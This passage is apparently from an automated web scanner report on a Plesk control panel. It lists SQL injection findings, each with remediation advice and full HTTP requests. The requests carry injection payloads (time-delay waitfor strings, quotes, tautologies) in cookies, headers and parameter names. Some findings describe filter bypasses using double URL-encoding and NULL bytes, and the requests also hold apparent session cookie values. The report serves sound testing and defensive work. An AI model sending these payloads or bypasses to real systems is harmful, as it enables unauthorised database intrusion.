The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /smb/redirect/pleskin/root//?dst=%2Fplesk%2Fclient%401%2Fdomain%401%2Fhosting%2Ffile-manager%2F&src=%2Fsmb%2Fweb%2Fview%2Fid%2F1&srcController=WebController HTTP/1.1
Host: 174.122.23.218:8880
Proxy-Connection: keep-alive
Referer: http://174.122.23.218:8880/smb/web/view/id/1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: show-getting-started-popup=false; do-not-show-getting-started-popup=true; show-getting-started-popup=true; user=187d997e8ea6a5d0f56792f7f9ba70a4; PLESKSESSID=9d849cf17c2d47b0f3a3632f74ebeeaf',0)waitfor%20delay'0%3a0%3a20'--; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 03:04:38 GMT
Connection: close
Content-Length: 85847

<br />
<b>Notice</b>: Constant PRODUCT_MODE already defined in <b>C:\Program Files (x86)\Parallels\Plesk\admin\auto_prepend\auth.php3</b> on line <b>11</b><br />
<br />
<b>Notice</b>: Constant VZCP_
...[SNIP]...
</b>: Constant SERVICE_POSTGRESQL already defined in <b>
...[SNIP]...

1.18. http://174.122.23.218:8880/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ',0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /?1',0,0,0)waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: 174.122.23.218:8880
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US; SessionID=42b54cb11fc3aedbd; psaContext=dashboard; testCookie=test

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 03:04:35 GMT
Connection: close
Content-Length: 85847

<br />
<b>Notice</b>: Constant PRODUCT_MODE already defined in <b>C:\Program Files (x86)\Parallels\Plesk\admin\auto_prepend\auth.php3</b> on line <b>11</b><br />
<br />
<b>Notice</b>: Constant VZCP_
...[SNIP]...
</b>: Constant SERVICE_POSTGRESQL already defined in <b>
...[SNIP]...

1.19. http://174.122.23.218:8880/domains/sitebuilder_edit.php [User-Agent HTTP header]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /domains/sitebuilder_edit.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the User-Agent HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /domains/sitebuilder_edit.php?dom_id=1 HTTP/1.1
Accept: */*
Referer: http://174.122.23.218:8880/smb/admin-home
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)'
Accept-Encoding: gzip, deflate
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:26:16 GMT
Connection: close
Content-Length: 85847

<br />
<b>Notice</b>: Constant PRODUCT_MODE already defined in <b>C:\Program Files (x86)\Parallels\Plesk\admin\auto_prepend\auth.php3</b> on line <b>11</b><br />
<br />
<b>Notice</b>: Constant VZCP_
...[SNIP]...
</b>: Constant SERVICE_POSTGRESQL already defined in <b>
...[SNIP]...

1.20. http://174.122.23.218:8880/domains/sitebuilder_edit.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /domains/sitebuilder_edit.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload '%20and%201%3d1--%20 was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /domains/sitebuilder_edit.php?dom_id=1&1'%20and%201%3d1--%20=1 HTTP/1.1
Accept: */*
Referer: http://174.122.23.218:8880/smb/admin-home
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:26:00 GMT
Connection: close
Content-Length: 85847

<br />
<b>Notice</b>: Constant PRODUCT_MODE already defined in <b>C:\Program Files (x86)\Parallels\Plesk\admin\auto_prepend\auth.php3</b> on line <b>11</b><br />
<br />
<b>Notice</b>: Constant VZCP_
...[SNIP]...
</b>: Constant SERVICE_POSTGRESQL already defined in <b>
...[SNIP]...

1.21. http://174.122.23.218:8880/javascript/chk.js.php [PHPSESSID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /javascript/chk.js.php

Issue detail

The PHPSESSID cookie appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the PHPSESSID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /javascript/chk.js.php?plesk_version=psa-10.2.0-20100707.19 HTTP/1.1
Accept: */*
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645')waitfor%20delay'0%3a0%3a20'--; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US; SessionID=42b54cb11fc3aedbd; psaContext=dashboard

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:42:38 GMT
Connection: close
Content-Length: 84814

<br />
<b>Notice</b>: Constant PRODUCT_MODE already defined in <b>C:\Program Files (x86)\Parallels\Plesk\admin\auto_prepend\auth.php3</b> on line <b>11</b><br />
<br />
<b>Notice</b>: Constant VZCP_
...[SNIP]...
</b>: Constant SERVICE_POSTGRESQL already defined in <b>
...[SNIP]...

1.22. http://174.122.23.218:8880/javascript/chk.js.php [sessionID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /javascript/chk.js.php

Issue detail

The sessionID cookie appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the sessionID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the sessionID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /javascript/chk.js.php?plesk_version=psa-10.2.0-20100707.19 HTTP/1.1
Accept: */*
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj%2527; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US; SessionID=42b54cb11fc3aedbd; psaContext=dashboard

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:42:45 GMT
Connection: close
Content-Length: 84814

<br />
<b>Notice</b>: Constant PRODUCT_MODE already defined in <b>C:\Program Files (x86)\Parallels\Plesk\admin\auto_prepend\auth.php3</b> on line <b>11</b><br />
<br />
<b>Notice</b>: Constant VZCP_
...[SNIP]...
</b>: Constant SERVICE_POSTGRESQL already defined in <b>
...[SNIP]...

1.23. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/ [PLESKSESSID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/

Issue detail

The PLESKSESSID cookie appears to be vulnerable to SQL injection attacks. The payload " was submitted in the PLESKSESSID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /plesk/client@1/domain@1/hosting/file-manager/ HTTP/1.1
Accept: */*
Referer: http://174.122.23.218:8880/smb/admin-home
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645"; locale=en-US; SessionID=42b54cb11fc3aedbd

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:33:55 GMT
Connection: close
Content-Length: 85847

<br />
<b>Notice</b>: Constant PRODUCT_MODE already defined in <b>C:\Program Files (x86)\Parallels\Plesk\admin\auto_prepend\auth.php3</b> on line <b>11</b><br />
<br />
<b>Notice</b>: Constant VZCP_
...[SNIP]...
</b>: Constant SERVICE_POSTGRESQL already defined in <b>
...[SNIP]...

1.24. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/ [SessionID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/

Issue detail

The SessionID cookie appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the SessionID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the SessionID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

POST /plesk/client@1/domain@1/hosting/file-manager/ HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Content-Type: multipart/form-data; boundary=---------------------------7da2691c404b0
Accept-Encoding: gzip, deflate
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US; SessionID=42b54cb11fc3aedbd%2527; psaContext=dashboard; testCookie=test
Content-Length: 1938

-----------------------------7da2691c404b0
Content-Disposition: form-data; name="filter"


-----------------------------7da2691c404b0
Content-Disposition: form-data; name="bname_show_all"

Rese
...[SNIP]...

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 03:04:38 GMT
Connection: close
Content-Length: 85847

<br />
<b>Notice</b>: Constant PRODUCT_MODE already defined in <b>C:\Program Files (x86)\Parallels\Plesk\admin\auto_prepend\auth.php3</b> on line <b>11</b><br />
<br />
<b>Notice</b>: Constant VZCP_
...[SNIP]...
</b>: Constant SERVICE_POSTGRESQL already defined in <b>
...[SNIP]...

1.25. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/ [locale cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/

Issue detail

The locale cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the locale cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /plesk/client@1/domain@1/hosting/file-manager/ HTTP/1.1
Accept: */*
Referer: http://174.122.23.218:8880/smb/admin-home
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US'; SessionID=42b54cb11fc3aedbd

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:34:17 GMT
Connection: close
Content-Length: 85847

<br />
<b>Notice</b>: Constant PRODUCT_MODE already defined in <b>C:\Program Files (x86)\Parallels\Plesk\admin\auto_prepend\auth.php3</b> on line <b>11</b><br />
<br />
<b>Notice</b>: Constant VZCP_
...[SNIP]...
</b>: Constant SERVICE_POSTGRESQL already defined in <b>
...[SNIP]...

1.26. http://174.122.23.218:8880/smb/admin-home/application-items/ [user cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/admin-home/application-items/

Issue detail

The user cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the user cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /smb/admin-home/application-items/ HTTP/1.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us
x-prototype-version: 1.6.1_rc3
Referer: http://174.122.23.218:8880/smb/admin-home
x-requested-with: XMLHttpRequest
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Cookie: show-getting-started-popup=false; user=54a8ad2443247fe6e4900290dc4e0cf8%00'; do-not-show-getting-started-popup=true; PHPSESSID=10321169792bce25daa15603ea9ba645

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:52:55 GMT
Content-Length: 1208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

Request 2

GET /smb/admin-home/application-items/ HTTP/1.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us
x-prototype-version: 1.6.1_rc3
Referer: http://174.122.23.218:8880/smb/admin-home
x-requested-with: XMLHttpRequest
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Cookie: show-getting-started-popup=false; user=54a8ad2443247fe6e4900290dc4e0cf8%00''; do-not-show-getting-started-popup=true; PHPSESSID=10321169792bce25daa15603ea9ba645

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:52:56 GMT
Connection: close
Content-Length: 5386

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.ListContainer({
renderTo: 'applicationItems-content-area',
items: [

...[SNIP]...

1.27. http://174.122.23.218:8880/smb/app/available/id/apscatalog [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/app/available/id/apscatalog

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

POST /smb/app/available/id/apscatalog HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/smb/app/available/id/apscatalog
Cookie: do-not-show-getting-started-popup=true; show-getting-started-popup=false; PHPSESSID=10321169792bce25daa15603ea9ba645; user=54a8ad2443247fe6e4900290dc4e0cf8;
Content-Type: application/x-www-form-urlencoded
Content-Length: 96

packager=&catalogType=apscatalog&vendor=&name=&catalogId=apscatalog&packageId=&release=&version=&1%00'=1

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:33:12 GMT
Connection: close
Content-Length: 1208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

Request 2

POST /smb/app/available/id/apscatalog HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/smb/app/available/id/apscatalog
Cookie: do-not-show-getting-started-popup=true; show-getting-started-popup=false; PHPSESSID=10321169792bce25daa15603ea9ba645; user=54a8ad2443247fe6e4900290dc4e0cf8;
Content-Type: application/x-www-form-urlencoded
Content-Length: 96

packager=&catalogType=apscatalog&vendor=&name=&catalogId=apscatalog&packageId=&release=&version=&1%00''=1

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:33:12 GMT
Connection: close
Content-Length: 15471


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

1.28. http://174.122.23.218:8880/smb/app/available/id/apscatalog [user cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/app/available/id/apscatalog

Issue detail

The user cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the user cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the user cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /smb/app/available/id/apscatalog HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/smb/app/market/id/marketplace
Cookie: do-not-show-getting-started-popup=true; show-getting-started-popup=false; PHPSESSID=10321169792bce25daa15603ea9ba645; user=54a8ad2443247fe6e4900290dc4e0cf8%2527;

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:29:37 GMT
Connection: close
Content-Length: 1208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

Request 2

GET /smb/app/available/id/apscatalog HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/smb/app/market/id/marketplace
Cookie: do-not-show-getting-started-popup=true; show-getting-started-popup=false; PHPSESSID=10321169792bce25daa15603ea9ba645; user=54a8ad2443247fe6e4900290dc4e0cf8%2527%2527;

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:29:39 GMT
Connection: close
Content-Length: 15471


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

1.29. http://174.122.23.218:8880/smb/app/available/id/apscatalog/ [catalogType parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/app/available/id/apscatalog/

Issue detail

The catalogType parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catalogType parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

POST /smb/app/available/id/apscatalog/ HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/smb/app/available/id/apscatalog/
Cookie: do-not-show-getting-started-popup=true; show-getting-started-popup=false; PHPSESSID=10321169792bce25daa15603ea9ba645; user=54a8ad2443247fe6e4900290dc4e0cf8;
Content-Type: application/x-www-form-urlencoded
Content-Length: 96

packager=&catalogType=apscatalog%00'&vendor=&name=&catalogId=apscatalog&packageId=&release=&version=

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:30:06 GMT
Connection: close
Content-Length: 1208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

Request 2

POST /smb/app/available/id/apscatalog/ HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/smb/app/available/id/apscatalog/
Cookie: do-not-show-getting-started-popup=true; show-getting-started-popup=false; PHPSESSID=10321169792bce25daa15603ea9ba645; user=54a8ad2443247fe6e4900290dc4e0cf8;
Content-Type: application/x-www-form-urlencoded
Content-Length: 96

packager=&catalogType=apscatalog%00''&vendor=&name=&catalogId=apscatalog&packageId=&release=&version=

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:30:08 GMT
Connection: close
Content-Length: 15471


